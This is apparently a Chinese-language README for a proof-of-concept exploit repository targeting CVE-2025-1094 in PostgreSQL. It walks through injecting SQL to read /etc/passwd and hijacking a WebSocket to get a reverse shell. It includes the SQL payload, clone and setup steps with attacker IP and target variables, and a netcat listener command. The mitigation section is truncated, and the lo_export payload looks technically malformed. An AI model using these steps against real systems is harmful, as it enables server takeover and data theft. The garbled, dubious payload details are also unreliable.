
WebSocket 与 SQL 注入漏洞利用脚本
本仓库包含针对 CVE-2025-1094 的概念验证(PoC)利用程序,该漏洞存在于 PostgreSQL 中,允许通过 WebSocket 劫持将 SQL 注入(SQLi)攻击升级为远程代码执行(RCE)。
此漏洞利用利用 PostgreSQL 中的 SQL 注入漏洞,注入恶意代码来读取敏感文件(例如 /etc/passwd),并将其存储在易受攻击的服务器上。然后,漏洞利用劫持一个活跃的 WebSocket 连接以执行任意命令,最终在被攻陷的服务器上获取远程 shell。
SQL 注入(SQLi):攻击首先向易受攻击的 PostgreSQL 端点注入恶意 SQL 命令。负载使用 lo_export 从服务器读取敏感文件。
WebSocket 劫持:攻击者劫持一个开放的 WebSocket 连接,并发送负载以执行 RCE。这会触发一个反向 shell 连接回到攻击者的系统。
远程代码执行(RCE):反向 shell 为攻击者提供对服务器的完全控制,允许进一步的利用。
SELECT lo_export( (SELECT convert_from(pg_read_file('/etc/passwd'), 'UTF8')), '/tmp/payload');
上述 SQL 负载读取 /etc/passwd 文件并将其保存为 /tmp/payload。文件被获取后,漏洞利用使用 WebSocket 劫持来建立反向 shell。
克隆仓库:
git clone https://github.com/soltanali0/CVE-2025-1094.git
cd CVE-2025-1094
修改脚本中的以下变量:
REVERSE_IP:你的攻击者 IP 地址REVERSE_PORT:你的监听器运行的端口TARGET_URL:要攻击的易受攻击端点WEBSOCKET_URL:要劫持的 WebSocket 网址运行脚本以利用漏洞并建立反向 shell。
在指定端口上启动 netcat 监听器:
nc -lvnp <REVERSE_PORT>
为防范此漏洞:
lo_export 等函数。此漏洞利用仅用于教育目的。在测试任何系统之前,请确保你拥有明确授权。未经授权访问计算机系统是非法的。